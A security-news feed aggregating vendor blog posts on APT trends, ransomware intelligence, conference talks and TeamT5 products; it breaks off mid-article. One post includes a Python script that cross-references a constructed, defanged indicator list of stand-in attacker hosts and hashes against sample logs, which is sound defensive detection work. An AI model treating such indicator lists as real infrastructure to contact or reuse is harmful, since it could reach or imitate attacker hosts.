Pipes Feed Preview: Feed not found & SECURITY.COM & TeamT5 Blog & Natto Thoughts & JPCERT/CCブログ 日本語版 & nao_sec & ESET Ireland & No Feed provided

  1. 🎙️SECURITY.COM The Podcast: 2026 Threat Predictions

    Mon, 16 Feb 2026 13:00:00 -0000

    This year’s threat forecast: ransomware, and a whole lot more
  2. Identity is the control plane, and AI just changed the game

    Thu, 12 Feb 2026 16:45:00 -0000

    An AI-impacted identity ecosystem calls for a new take on an old approach
  3. Don’t Lose Sleep Over These 4 Concerns

    Wed, 11 Feb 2026 13:00:00 -0000

    It takes legendary defenses to keep security nightmares at bay
  4. Good News: Symantec DLP 25.1 Achieves Common Criteria EAL2+ Certification

    Mon, 09 Feb 2026 13:00:00 -0000

    Enterprise-grade data security, independently verified
  5. 🎙️SECURITY.COM The Podcast: AI Code Insecurity

    Thu, 05 Feb 2026 13:00:00 -0000

    Why better tech hasn’t solved code security, growing up in the industry, and when goofing around turns into a Senate invite
  6. Reynolds: Defense Evasion Capability Embedded in Ransomware Payload

    Thu, 05 Feb 2026 11:00:00 -0000

    BYOVD component included in ransomware payload itself, rather than as a separate tool.
  7. The Rise of OpenClaw

    Wed, 04 Feb 2026 21:30:00 -0000

    The growing threat of automated attack infrastructure
  8. Cyber Legends: Inside The Mind of a Threat Analyst

    Wed, 04 Feb 2026 13:00:00 -0000

    How research, analysis, and communication turn signals into insight
  9. Private Cloud is Back

    Mon, 02 Feb 2026 16:00:00 -0000

    Why federal agencies are rethinking hybrid cloud strategy
  10. Better Together: Modernizing Access Management with Symantec SiteMinder and VMware vSphere Kubernetes Service

    Thu, 29 Jan 2026 18:00:00 -0000

    Say hello to a unified platform that brings identity security and cloud‑native infrastructure together
  11. We’re Exhibiting at RSA Conference 2026

    Sun, 08 Feb 2026 16:00:00 -0000

    We are pleased to announce that we will be exhibiting at **RSA Conference 2026**, one of the world’s leading cybersecurity events, taking place in San Francisco. This year, we will join the **Taiwan Pavilion** and present our approach to threat **intelligence built from Asia-born insights with global relevance**.

    - **Event**: RSA Conference 2026
    - **Expo date**: March 24-26, 2026
    - **Booth**: S-1561
    - **Location**: Moscone Center, San Francisco, USA

    ## Threat Intelligence Pioneer, Born in Asia

    Cyber threats do not emerge evenly across regions. Many large-scale campaigns and advanced persistent threats (APTs) are first observed in Asia before expanding globally.

    As a threat intelligence team born and rooted in Asia, we focus on delivering early visibility into adversary behavior, regional geopolitical context, and long-term campaign evolution, helping organizations understand not only what is happening but why it is happening.

    At RSA Conference 2026, we will showcase how Asia-Pacific-centric intelligence can complement global security strategies and close critical visibility gaps.

    ## Our Threat Intelligence Approach

    Our intelligence framework is designed to support security decision-making across strategic, tactical, and operational layers:

    ### Strategic: Geopolitical Insight & Adversary Profiling

    We analyze geopolitical drivers and long-term adversary behavior to help organizations anticipate emerging threats, understand attacker motivations, and assess risk beyond isolated incidents.

    ### Tactical: Intelligence-Driven Threat Hunting

    Our intelligence translates real-world adversary TTPs and active campaign insights into actionable threat hunting, enabling security teams to focus on relevant actors rather than generic indicators.

    ### Operational: Threat Response

    We help organizations operationalize threat intelligence and ensure it is embedded directly into detection and response workflows.

    Together, these layers turn threat intelligence from static information into practical, actionable defense. For more about our threat intelligence reports and the "ThreatVision" platform, see [here](https://teamt5.org/en/products/threatvision/?utm_source=blog&utm_medium=website).

    ## Meet Us at RSA Conference 2026

    Throughout the three-day event, our team will be available at Booth S-1561 to discuss:

    - Asia-Pacific threat actors and campaigns
    - Intelligence-driven threat hunting strategies
    - Operationalizing threat intelligence at scale
    - How regional intelligence enhances global defense

    Whether you are building a CTI program, refining threat hunting workflows, or looking to strengthen operational response, we welcome the opportunity to connect.

    **Threat Intelligence Pioneer, Born in Asia**
    📍 Visit us at RSA Conference 2026 – Booth S-1561 (Taiwan Pavilion)

    Image: https://uploads.teamt5.org/upload/original/teamt5-rsa-conference-2026_pic.png
  12. APT Threat Landscape in APAC 2025: Industrialization of Intrusions

    Sun, 08 Feb 2026 16:00:00 -0000

    With geopolitical tensions continuing to escalate across the APAC region, APT activity in the region is intensifying in both volume and sophistication. **In 2025, TeamT5 tracked more than 510 APT operations affecting 67 countries globally, up steadily from 2024. Of these, 173 attacks targeted Taiwan, far exceeding activity levels seen in other regional targets.**

    Over the years, we have observed that Taiwan remains the most consistently and heavily targeted environment for cyber operations, with China responsible for the majority of observed activity. Taiwan’s role in geopolitical tensions and its value in the global technology supply chain make it uniquely attractive to adversaries who seek intelligence or long-term access to achieve political and military objectives. The scale, diversity, and persistence of these campaigns position Taiwan not only as a frontline target, but also as an early-warning bellwether for the direction of China-nexus intrusion tradecraft. Campaigns observed in Taiwan frequently showcase early adoption of new tooling and evolving TTPs; therefore, **Taiwan is more than just a target: it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments.**

    ## Key Trends: Targeting of Edge Devices, Abuse of Trusted Services, and Disposable Malware

    As defenders continue to harden endpoints with capabilities like EDR, threat actors are adapting by shifting operations to layers with comparatively limited telemetry and weaker detection coverage. That shift is reflected in our 2025 findings: **we tracked 27 critical vulnerabilities, most of which impacted edge devices such as firewalls, routers, and VPN appliances.** Moreover, China-nexus actors have paired exploitation with custom backdoors tailored to specific device families. These backdoors are often designed to persist even after the underlying vulnerability is patched or the device is rebooted. This transforms one-time perimeter access into long-term access across victim networks and significantly raises the difficulty of detection and complete eradication. In addition, Internet of Things (IoT) devices are increasingly being abused by threat actors for a range of malicious objectives, particularly as low-noise infrastructure that blends into normal network traffic. For example, we observed actors chaining compromised IoT devices into operational relay box (ORB) networks to stage and route attacks, effectively obscuring the origin of malicious activity. In other cases, actors have abused Network Attached Storage (NAS) systems as reverse SSH tunnel relays, facilitating data exfiltration through an intermediary that often appears benign.

    **Supply chain attacks accelerated further in 2025, reinforcing what TeamT5 describes as the “Fail-of-Trust Model”.** In a supply chain attack, threat actors compromise software vendors, managed service providers, or cloud service providers to exploit inherited trust and pivot into their downstream customer environments. In Taiwan, TeamT5 observed multiple attacks in which Chinese actors (e.g., Huapi and SLIME86) first compromised upstream IT service providers, then leveraged that access to move laterally into government, military, and critical infrastructure networks. In other notable cases attributed to the China-nexus groups SocialNetworkTeam and SLIME40 (aka Salt Typhoon), threat actors compromised national telecom networks and used that access for long-term traffic interception and surveillance, including DNS manipulation and ISP-level hijacking. These campaigns directly erode a foundational assumption of the digital ecosystem: that “trusted” suppliers are secure. By weaponizing trusted relationships as attack paths, supply chain operations turn implicit trust into a liability, hence the “Fail-of-Trust Model.” Consistent with this shift, we observed a clear uptick in 2025 attacks aimed at the IT sector. Threat actors are increasingly treating IT providers as strategic infrastructure, using them as launchpads to reach downstream targets more efficiently and at far greater scale.

    **Malware deployment tradecraft also evolved in 2025. Across the 300+ malicious samples we tracked, we saw a clear rise in customized, disposable “one-time” malware.** Much of it consisted of lightweight loaders and downloaders, which are quick to build, easy to tailor to a specific intrusion chain, and inherently more capable of evading signature-based detection. In parallel, we increasingly observed multi-tool intrusion stacks, where actors deploy more than one malware family and/or a mix of malware and legitimate hacking tools within the same operation. This reduces single points of failure: if one component is detected or blocked, others can maintain access, pivot laterally, or re-establish command-and-control. For defenders, the result is a broader, more fragmented footprint that slows triage and makes complete eradication harder.

    ## From APT Groups to a China-nexus “Whole-of-Nation” APT Ecosystem

    The observed increase in volume and sophistication of APT operations occurs in parallel with increasing signs of a maturing APT ecosystem in China. Over the years, **China has been cultivating its offensive cyber capabilities through a “whole-of-nation” model**: the state retains strategic direction (e.g., prioritizing intelligence requirements and target sets) while execution capacity is expanded through a market of contractors, brokers, and specialist vendors. Public attributions and industry reporting over the last few years increasingly describe a threat landscape where the boundary between “state” and “private sector” is operationally blurred, producing an industrial-scale pipeline for intrusions. The Chinese APT ecosystem blends state direction with “hacking-as-a-service” dynamics: capability is packaged, priced, and delivered in units that can be purchased, tasked, or repurposed. The 2024 I-Soon leak showed how a private Chinese company conducted intrusions and monetized access, and how such contractor capacity can be integrated into state-aligned operations.

    In 2025, more evidence surfaced, via indictments, sanctions packages, and leaked materials, that Chinese private-sector vendors are not merely tooling suppliers but can play operational roles across intrusion activity. Taken together, these disclosures point to an ecosystem that is becoming more modular and specialized as it scales. **That industrialization is most visible in the shift from a traditional “one APT group runs the full kill chain” assumption to a service-layered model.** Instead of one team doing everything end-to-end, different providers can contribute capabilities at distinct stages. Examples map cleanly onto this cyber supply chain:

    - At the front end are large-scale reconnaissance providers conducting internet-wide scanning and target profiling.
    - Midstream are developers producing exploits, modular malware components, and tailored one-time payloads optimized for specific environments.
    - At the back end are infrastructure operators who specialize in command-and-control, proxy layers, and operational relay box (ORB) networks.

    This division of labor enables faster iteration, higher operational tempo, and greater resiliency.

    ## Looking Forward

    For governments, enterprises, and critical sectors worldwide, **the lesson is clear: indicator-driven defense can’t keep up with an industrialized intrusion ecosystem that can quickly change tools, servers, and routes when exposed.** Defenders therefore have to move upstream to proactive, hypothesis-driven threat hunting that prioritizes durable behaviors over short-lived signatures. This approach shifts the objective from “blocking known bad” to finding active tradecraft early, before the adversary completes collection and exfiltration.

    But hunting alone is not enough, because this is an ecosystem problem. **Effective defense also requires deep regional intelligence that explains how the ecosystem is organized.** That context turns scattered telemetry into actionable understanding, enabling defenders to distinguish who is responsible for reconnaissance, initial access, payload delivery, and infrastructure enablement. With those roles mapped, defenders can better anticipate likely next moves in the kill chain and apply disruption at the points of greatest leverage.

    TeamT5 believes meaningful impact depends on international collaboration grounded in shared adversary insight. In other words, defenders must compete with an industrial system by responding as a coordinated system. **TeamT5 is committed to doing our part: contributing high-quality cyber threat intelligence, supporting joint response efforts, and strengthening the partnerships that make collective defense work.**

    ## About TeamT5

    TeamT5 is an APAC-focused threat intelligence expert. Leveraging Taiwan’s unique geopolitical vantage point, multilingual capabilities, and over two decades of research experience, we specialize in APT and ransomware threats across the Asia-Pacific region. We deliver highly localized, action-oriented threat intelligence and defense solutions for government, financial, and technology sectors.

    We believe that effective cybersecurity begins with continuous tracking and deep understanding of threats. With research at our core, TeamT5 transforms complex and rapidly evolving attack behaviors into actionable intelligence, enabling organizations to anticipate risks and shift from reactive response to proactive defense, reducing cyber risk.

    As a practitioner of intelligence-driven cyber defense, TeamT5 continuously monitors emerging threats, precisely analyzes attack patterns, and acts with agility to minimize risk exposure. We also value trust and collaboration, actively sharing research insights at world-class cybersecurity conferences and international forums. By working closely with the global security community, as well as our customers and partners, we help advance the practical application of threat intelligence and strengthen cyber resilience.

    > More insights: [[Whitepaper] Seeing the Pattern Behind The Attacks: APAC Intelligence for CISOs Worldwide](https://teamt5.org/en/posts/seeing-the-pattern-behind-the-attacks-apac-intelligence-for-cis-os-worldwide/?utm_source=website&utm_medium=website)
  13. Intelligence-driven cybersecurity check: How to accelerate the anti-hacking cycle of "detection → identification → response"?

    Sun, 01 Feb 2026 16:00:00 -0000

    In the wave of digital transformation, cybersecurity threats are ever-present. Imagine attackers silently infiltrating your network, using legitimate tools to bypass endpoint detection and response (EDR) platforms and implant hidden backdoors. According to [BISI](https://bisi.org.uk/reports/apts-global-review-2022-2025-trends-regions-forecast)'s global [advanced persistent threat (APT)](https://teamt5.org/en/posts/what-is-advanced-persistent-threat-apt/) trends survey, the frequency and complexity of APT attacks have been increasing since 2022, with more than half of APT attacks concentrated in the Asia-Pacific region and affecting [the IT industry, government agencies, and infrastructure](https://teamt5.org/en/posts/2025-h1-apt-threat-landscape-insights-asia-pacific-emerges-as-cyberattack-hotspot-experts-highlight-critical-defense-priorities/?utm_source=blog&utm_medium=website). These are just the tip of the iceberg; many more attacks remain undetected beneath the surface, and not seeing them does not mean that enterprises or organizations have not been compromised.

    Let's explore together how to shorten the defense cycle and allocate limited resources effectively across "speed × depth × coverage".

    ## The stealthy attacker: the defender's "blind spot"

    Today's cyberattacks have entered the era of "disguise." APT groups exploit built-in Windows tools, system services, and even legitimate third-party applications to bypass detection by security solutions.

    **Common APT camouflage techniques include:**

    - **Disguising as Legitimate Activity**: Masquerading as legitimate tools or OS-native functions to evade EDR/AV detection
    - **Neutralizing Monitoring Points**: Disabling Windows monitoring and scanning functions to evade EDR detection
    - **Minimizing Artifacts**: Hidden backdoors that activate only under specific connection sequences and are normally not detected

    Meanwhile, enterprise IT infrastructure is becoming increasingly decentralized. The intermingling of cloud services, outsourcing vendors, subsidiaries, and remote work environments creates a significant visibility gap for defenders. Any unmonitored or unreported endpoint device may harbor a threat, further blurring the defender's vision.

    > For more attack methods that bypass EDR defenses and the corresponding prevention strategies, see: [How Cybercriminals Bypass EDR — And What Your Company Should Do](https://teamt5.org/en/posts/how-cybercriminals-bypass-edr-and-what-your-company-should-do-1/?utm_source=blog&utm_medium=website)

    ## The triangular dilemma of limited resources: speed, depth, and coverage

    Frontline cybersecurity personnel typically face the challenge of limited resources, often having to make trade-offs between speed, depth, and coverage, three factors that are difficult to achieve simultaneously in practice.

    ThreatSonar's core philosophy is to rapidly narrow down the scope of unknown threats using a **"first screening → focused in-depth → precise handling"** model, reducing the investigation from "thousands of devices" to "a few critical devices" within limited resources. Its defense strategy is analogous to "conducting a comprehensive health check first, followed by further diagnosis."

    ## ThreatSonar's dual-axis defense strategy: "Emergency Situation" and "Routine Operations"

    Two key application scenarios for ThreatSonar together construct a complete defense strategy:

    **1. During emergencies: Rapid screening**

    When a suspected intrusion or anomaly occurs, having the time to respond is crucial.

    - **Rapid Locator**: ThreatSonar can complete an endpoint scan in approximately one hour, identifying critical suspicious devices from among thousands of devices.
    - **Deep Forensics**: Deep forensic analysis is performed on the identified compromised devices.

    This mechanism not only significantly shortens the investigation cycle but also avoids a large amount of time wasted on false positives and redundant analysis.

    **2. During Routine Operations: Regular Compromise Assessment (CA)**

    During normal operation, ThreatSonar monitors operational status and ensures environmental safety through regular scans.

    - **Establishing a Baseline**: Initially establishing a normal baseline for the environment.
    - **Periodic Scans**: Monthly or quarterly scans are compared against the baseline to surface newly emerging anomalies, such as unknown programs and connections, persistence mechanisms (e.g., automatic startup, WMI events), DNS records, and execution history.

    Regular scanning allows businesses to detect potential suspicious activity early, effectively preventing threats from escalating.

    > [More about ThreatSonar features](https://teamt5.org/en/products/threatsonar/?utm_source=blog&utm_medium=website)

    ## ThreatSonar's Four Core Advantages

    ThreatSonar is not just a scanning tool, but a threat identification and analysis platform that integrates threat intelligence:

    **1. Specialized APT Detection**: Built-in YARA rule base integrating thousands of APT backdoor signatures, with the ability to import external Indicators of Compromise (IoCs) and STIX-format intelligence, effectively uncovering latent threats that bypass Endpoint Detection and Response (EDR).

    **2. Lightweight Deployment**: Supports Windows, Linux, macOS, and other operating systems. Lightweight installation: a download of approximately 5MB of executable file allows for immediate deployment without driver installation or system configuration changes. This facilitates rapid, large-scale deployment, quickly enhancing enterprise defense capabilities.

    **3. Comprehensive Visualization and Threat Classification**: Performs horizontal analysis across files, memory, network connections, and event logs. Threat risk levels are presented as Levels 0–5, helping administrators prioritize threat responses.

    **4. Memory identification and behavior tracing**: ThreatSonar can analyze memory and attack paths, and through timeline tracing, uncover the root cause of the attack and fully reconstruct the attack process.

    > [More about ThreatSonar features](https://teamt5.org/en/products/threatsonar/?utm_source=blog&utm_medium=website)

    ## Real-world Case Studies: ThreatSonar's Immediate Effectiveness

    ThreatSonar demonstrates significant benefits in real-world scenarios:

    - **Case Study 1: Comprehensive Health Check for a Large Enterprise**
      A major company implemented ThreatSonar to conduct a comprehensive scan of 10,000 endpoints. Within two weeks, it successfully discovered APT attack samples disguised as files and 2,268 malicious files (related to Ruby). Through automated analysis and threat risk classification, the company was able to quickly identify the attack path and establish a long-term, periodic assessment mechanism.
    - **Case Study 2: Rapid Response to Global Cybersecurity Incidents in the Manufacturing Industry**
      A manufacturing group with 50,000 employees accelerated its global incident response process through ThreatSonar. Before implementing ThreatSonar, the analysis process took 200 hours; after implementation, it took only 40 hours. Using ThreatSonar, a preliminary forensic report was completed within a few days, and the decision-making process at overseas locations was accelerated by more than five times, significantly improving overall response efficiency.

    > [More about ThreatSonar features](https://teamt5.org/en/products/threatsonar/?utm_source=blog&utm_medium=website)

    ## Conclusion: The Intelligence-Driven Future of Cybersecurity

    ThreatSonar transforms threat defense from a passive "defense" approach to a proactive "diagnosis" approach. It not only helps enterprises shorten the time from "discovery" to "response" (Mean Time To Detect, MTTD / Mean Time To Recover, MTTR), but also, by establishing baseline monitoring models and conducting regular checks, ensures accurate cybersecurity responses in both "daily operations" and "incident response" scenarios.

    In an era of limited resources and unlimited threats, the TeamT5 solution embodies an "intelligence-driven" cybersecurity mindset: based on threat intelligence and centered on insight, it enables rapid and effective proactive threat defense.
  14. 【Japan Security Analyst Conference 2026】TeamT5 Will Give Speech on the Massive Exploitation of Ivanti

    Wed, 07 Jan 2026 16:00:00 -0000

    This year, Japan Security Analyst Conference 2026 (JSAC2026) will be held on Jan. 21-23. This annual cybersecurity conference, hosted by JPCERT/CC, aims to bring together security analysts and provide opportunities for them to share technical knowledge related to incident response and analysis.

    Our Vulnerability Researcher, Greg Chen, and Incident Response Engineer, Sharon Liu, will deliver a talk titled “Incident Response at the Edge: Unmasking the Massive Exploitation of Ivanti” from 16:10 to 16:50 on January 22.

    ### About the Speech

    Since April 2025, TeamT5 has been warning of large-scale exploitation campaigns against Ivanti Connect Secure VPN, in which hundreds of devices belonging to governments and enterprises across more than 20 countries were compromised by the notorious SPAWN malware family (reference). In particular, over 40 companies’ Ivanti appliances were compromised in Japan, affecting high-value industries such as telecommunications, semiconductors, and electronics.

    These attacks demonstrate the growing risks at the edge of enterprise networks. Despite being the backbone of remote access, VPN appliances often operate as "black boxes": proprietary devices with only web-based maintenance access for IT. The lack of low-level shell control makes them opaque, creating blind spots in enterprise security. Their limited visibility allows attackers to maintain long-term persistence while making these devices exceptionally hard to investigate.

    This leads to the core focus of our presentation, which centers on the Ivanti VPN appliance and covers three main areas: (1) how we identify VPN devices compromised by the SPAWN malware family, (2) our methodology for investigating such black-box systems, and (3) the use of heuristic approaches beyond traditional pattern-based detection.

    Ultimately, we demonstrate practical detection solutions capable of identifying the SPAWN malware families in Ivanti appliances, along with detection strategies that organizations can adopt to strengthen defenses against ongoing and future VPN-targeted attacks.

    ### About JSAC 2026

    - Time: Jan. 21-23, 2026
    - Venue: Akasaka Intercity Conference Center, Tokyo, Japan
    - Website: https://jsac.jpcert.or.jp/en/index.html

    Cyber attacks occur on a daily basis, and their techniques are constantly changing. Engineers who analyze and respond to them are required to improve their skills to keep up with the ever-changing techniques of cyber attacks. However, there are few occasions in Japan where techniques and knowledge of incident analysis and response are shared among engineers. Security analysts are expected to get together and exchange their technical expertise on incident handling to develop their strength against cyber attacks, both individually and as a whole.

    To achieve this goal, JPCERT/CC hosts the Japan Security Analyst Conference (JSAC), the annual conference for exchanging technical information on cybersecurity incident analysis and response. At this conference, security analysts who handle security incidents on a daily basis are encouraged to share information with each other to deal with the ever-evolving cyber attacks of today and the future.
  15. 【TeamT5 Event Calendar 2026】Come by to find suitable solutions and build cybersecurity resilience!

    Tue, 06 Jan 2026 16:00:00 -0000

    Welcome to our events, where you can learn about TeamT5's intelligence-driven cybersecurity solutions.

    ## Future Events

    ### 2026/3/23~3/26 RSA Conference

    - Country: USA
    - Venue: Moscone Center, San Francisco, CA
    - Booth: S-1561 (Taiwan Pavilion)
    - More info: [event website](https://www.rsaconference.com/usa)

    ### 2026/5/5~5/7 CYBERSEC

    - Country: Taiwan
    - Venue: Hall 2 of Taipei Nangang Exhibition Center, Taipei
    - More info: [event website](https://cybersec.ithome.com.tw/2025/en/)

    ### 2026/6/15~6/19 FIRSTCON

    - Country: USA
    - Venue: Sheraton Denver Downtown Hotel, Denver, CO
    - More info: [event website](http://www.first.org/conference/2026)

    ### 2026 Digital Government Summit

    - Country: Taiwan
    - City: Taipei
    - More info: [event website](https://egov.ithome.com.tw/2025/index.html)

    ### 2026/12/2~12/3 Threat Analyst Summit

    - Country: Taiwan
    - Venue: ILLUME TAIPEI, Taipei
    - More info: [event website](https://tas.teamt5.org/?utm_source=websitecalendar&utm_medium=website)

    ## Past Events

    ### 2026/1/21 ~ 1/23 JSAC

    - Country: Japan
    - Venue: Ochanomizu Sora City Conference Center, Tokyo
    - Our cyber threat intelligence researchers will give a speech at the venue.
    - More info: [event website](https://jsac.jpcert.or.jp/)

    *Information for each event is subject to change by the organizer.
    *This article is updated from time to time.
  16. Outpace Ransomware Operators with ThreatVision Cybercrime Intelligence

    Sun, 04 Jan 2026 16:00:00 -0000

    <p>Ransomware attacks are no longer isolated incidents; they now operate as a fully developed criminal ecosystem built on <strong>organization</strong> and <strong>industrialization</strong>. From vulnerability exploitation and initial access, to data exfiltration and ransom negotiation, different actors participate in each stage, forming active and tightly connected networks across the dark web and underground forums. In the era of scalable <strong>Cybercrime-as-a-Service (CaaS)</strong>, enterprises relying solely on passive response and remediation often struggle to keep pace with rapidly evolving attacks.</p> <p><strong><a href="https://teamt5.org/en/products/cybercrime-intelligence/?utm_source=blog&amp;utm_medium=website">ThreatVision Cybercrime Intelligence</a></strong> is built on TeamT5’s long-standing research into APAC threat actors. By continuously tracking ransomware groups and underground criminal communities, ThreatVision helps enterprises gain deeper visibility into attacker motivations, technique evolution, and operational patterns, enabling security teams to shift from <strong>reactive response</strong> to <strong>proactive prevention</strong>, and to build stronger, long-term cyber resilience.</p> <h2>Intelligence-Driven Insights: Revealing the True Nature of Cybercrime</h2> <p>The core value of ThreatVision lies in its ability to consolidate dispersed information from underground communities and transform it into contextualized intelligence. Leveraging years of sustained observation of major ransomware and cybercrime operations across APAC, TeamT5 delivers three key intelligence categories that help enterprises stay informed on the most relevant developments:</p> <ul> <li><p><strong>Cybercrime Campaigns</strong><br/> In-depth analysis of specific criminal operations and cooperation chains between groups, revealing shifts in attacker strategy, target selection, and technical approaches.</p> </li> <li><p><strong>Forum Activities</strong><br/> Continuous monitoring of dark web and underground forum discussions, data leaks, and illicit transactions to identify early indicators of emerging threats.</p> </li> <li><p><strong>Ransomware Activities</strong><br/> Up-to-date tracking of major ransomware groups, analyzing attack trends, targeted industries, and technical evolution.</p> </li> </ul> <p>Together, these three intelligence categories provide a multi-angle view of cybercriminal behavior, enabling defense teams to understand the logic behind attacker activities and adjust detection strategies and security priorities accordingly.</p> <h2>From Intelligence to Action: Using ThreatVision Reports for Effective Defense</h2> <p><a href="https://teamt5.org/en/products/cybercrime-intelligence/?utm_source=blog&amp;utm_medium=website">ThreatVision’s cybercrime intelligence reports</a> not only provide contextual descriptions of attacks, but also disclose associated <strong>Indicators of Compromise (IoCs)</strong>, such as IP addresses, domains, and malicious file hashes. Enterprises can directly search and cross-reference these indicators within the ThreatVision platform to quickly determine whether they overlap with internal logs, network traffic, or alerts generated by Endpoint Detection and Response (EDR) and Security Information and Event Management (SIEM) systems, enabling immediate investigation or adjustment of blocking rules.</p> <p>In addition, ThreatVision provides information on malicious samples associated with criminal activities and attacks. This allows security teams to quickly determine possible origins and potential impact, improving the accuracy and efficiency of incident response.</p> <h2>From Observation to Early Warning: Building a Long-Term Intelligence-Driven Defense Cycle</h2> <p>To keep pace with fast-changing cybercrime activity, enterprises need intelligence that can be continuously updated, monitored, and operationalized in daily defense workflows. With <a href="https://teamt5.org/en/products/cybercrime-intelligence/?utm_source=blog&amp;utm_medium=website">ThreatVision Cybercrime Intelligence</a>, organizations can understand the background and context behind attack operations, use accompanying IoCs to verify exposure within their own environments, and access correlated intelligence on the platform. This enables the creation of a defense cycle that adapts dynamically as threats evolve.</p> <p><img src="https://uploads.teamt5.org/upload/original/pic_outpace-ransomware-operators-with-threat-vision-cybercrime-intelligence.jpg" alt=""></p> <blockquote> <p>Download the <a href="https://teamt5.org/en/posts/seeing-the-pattern-behind-the-attacks-apac-intelligence-for-cis-os-worldwide/?utm_source=blog&amp;utm_medium=website">cybercrime intelligence report “Seeing the Adversary: Why APAC Intelligence Matters for CISOs”</a> to understand how insights into attacker motivations and behavior can strengthen your organization’s defensive resilience.</p> </blockquote>
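    <p>The cross-referencing step described above, done outside any vendor platform, as an added example that is not ThreatVision code. It assumes the report's IoCs arrive as a flat text list, one indicator per line and possibly defanged (hxxp://, [.]), and it matches them against three constructed log excerpts in the rough shape of proxy, firewall and EDR output. Every indicator, hostname, address and hash below is made up for the demonstration. The points a practitioner usually gets wrong are handled explicitly: indicators must be refanged before matching, domain IoCs must also catch subdomains, CIDR IoCs must match any address inside the range, and hash comparison must ignore case.</p>

```python
"""Cross-reference a threat-intel IoC list against local log lines.

Added example, not ThreatVision code. The feed format and all log
lines are assumptions constructed for this demonstration.
"""
import ipaddress
import re
from collections import namedtuple

Hit = namedtuple("Hit", "source line_no kind indicator matched")

# Constructed IoC feed. Reports defang indicators so they cannot be
# clicked by accident; matching only works after refanging them.
IOC_FEED = """
# constructed ransomware-affiliate infrastructure, for the example only
hxxp://update-check[.]example/payload.bin
198.51.100[.]23
203.0.113.0/24
payroll-portal[.]example
4a6c1a7f0f3b2d9e8c5b6a7d8e9f0a1b2c3d4e5f60718293a4b5c6d7e8f90a1b
"""

# Constructed log excerpts (proxy, firewall, EDR) to search.
LOG_SOURCES = {
    "proxy": [
        "2026-01-05T08:12:01Z ws-0142 GET http://cdn.update-check.example/payload.bin 200",
        "2026-01-05T08:13:44Z ws-0142 GET https://intranet.corp.local/home 200",
        "2026-01-05T09:02:10Z ws-0388 GET https://PAYROLL-PORTAL.EXAMPLE/login 302",
    ],
    "firewall": [
        "2026-01-05T08:12:00Z ALLOW 10.20.1.42 -> 198.51.100.23:443",
        "2026-01-05T08:15:31Z ALLOW 10.20.1.42 -> 203.0.113.77:8443",
        "2026-01-05T08:16:02Z ALLOW 10.20.1.42 -> 192.0.2.10:443",
    ],
    "edr": [
        "2026-01-05T08:12:05Z ws-0142 file_write C:\\Users\\a\\payload.bin "
        "sha256=4A6C1A7F0F3B2D9E8C5B6A7D8E9F0A1B2C3D4E5F60718293A4B5C6D7E8F90A1B",
        "2026-01-05T08:20:00Z ws-0142 file_write C:\\Users\\a\\notes.txt "
        "sha256=0000000000000000000000000000000000000000000000000000000000000000",
    ],
}

HASH_RE = re.compile(r"\b(?:[0-9a-f]{64}|[0-9a-f]{40}|[0-9a-f]{32})\b", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def refang(text):
    """Undo the defanging conventions commonly used in intelligence reports."""
    return text.replace("[.]", ".").replace("hxxps://", "https://").replace("hxxp://", "http://")


def parse_feed(feed):
    """Sort feed lines into lowercase hashes, IP networks and host names."""
    iocs = {"hash": set(), "ip": set(), "domain": set()}
    for raw in feed.splitlines():
        line = refang(raw.strip())
        if not line or line.startswith("#"):
            continue
        if HASH_RE.fullmatch(line):
            iocs["hash"].add(line.lower())
            continue
        try:  # a bare address becomes a /32, a CIDR stays a network
            iocs["ip"].add(ipaddress.ip_network(line, strict=False))
            continue
        except ValueError:
            pass
        host = re.sub(r"^[a-z]+://", "", line, flags=re.I).split("/")[0].lower()
        if HOST_RE.fullmatch(host):  # URL or bare domain: keep only the host part
            iocs["domain"].add(host)
    return iocs


def match_host(host, domains):
    """Exact or subdomain match, so cdn.evil.example hits evil.example."""
    host = host.lower().rstrip(".")
    return next((d for d in domains if host == d or host.endswith("." + d)), None)


def match_ip(addr, networks):
    """Match an address against /32 and CIDR indicators alike."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:  # regex-shaped but not a valid address, e.g. 999.1.1.1
        return None
    return next((str(n) for n in networks if ip in n), None)


def scan(source, lines, iocs):
    """Return one Hit per indicator occurrence in the given log lines."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        for h in HASH_RE.findall(line):
            if h.lower() in iocs["hash"]:
                hits.append(Hit(source, line_no, "hash", h.lower(), h))
        for addr in IPV4_RE.findall(line):
            net = match_ip(addr, iocs["ip"])
            if net:
                hits.append(Hit(source, line_no, "ip", net, addr))
        for host in HOST_RE.findall(line):
            dom = match_host(host, iocs["domain"])
            if dom:
                hits.append(Hit(source, line_no, "domain", dom, host))
    return hits


def cross_reference(feed=IOC_FEED, sources=LOG_SOURCES):
    """Parse the feed once and scan every log source with it."""
    iocs = parse_feed(feed)
    return [hit for name, lines in sources.items() for hit in scan(name, lines, iocs)]


if __name__ == "__main__":
    for hit in cross_reference():
        print(f"{hit.source}:{hit.line_no} {hit.kind} {hit.matched} -> {hit.indicator}")
```

    <p>Run as a script, it reports five hits on the constructed data: the subdomain and the upper-cased host in the proxy log, the /32 and the in-range address in the firewall log, and the upper-cased hash in the EDR log; the benign lines produce nothing. In practice the same loop is pointed at a SIEM export or an EDR search API, and each hit's <code>source</code> and <code>line_no</code> is what the investigator pivots on next.</p>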
  17. Enterprise Cybersecurity Defense Guide [2026 Version]: How Can Enterprises Reduce Risks and Defend Against Threats?

    Thu, 01 Jan 2026 16:00:00 -0000

    <p>Faced with the rapid escalation of AI-driven attacks, ransomware threats, and cloud risks in 2026, enterprises must possess more mature and comprehensive cybersecurity defense capabilities. This article draws upon over 20 years of cybersecurity experience from <a href="https://teamt5.org/en/about-us/?utm_source=blog&amp;utm_medium=website">TeamT5</a>, summarizing the latest threat trends and practical recommendations, and highlighting key considerations when selecting a cybersecurity solution.</p> <p>We hope to help enterprises quickly grasp current cybersecurity challenges, establish more resilient protection strategies, and assist them in achieving continued and robust growth.</p> <h2>Common Cybersecurity Threats for Enterprises</h2> <p>The most common cyber threats to enterprises include ransomware, malware, and cybercrime activities on the dark web and underground forums. To minimize these risks, it is recommended to implement appropriate cybersecurity solutions or services. Strengthening enterprises’ cybersecurity resilience can help prevent operational disruptions, data breaches, and potential damage to your enterprise reputation.</p> <h2>Growing Ransomware Threat: Enterprises must prepare in advance</h2> <p>Ransomware encrypts data or blocks system access, 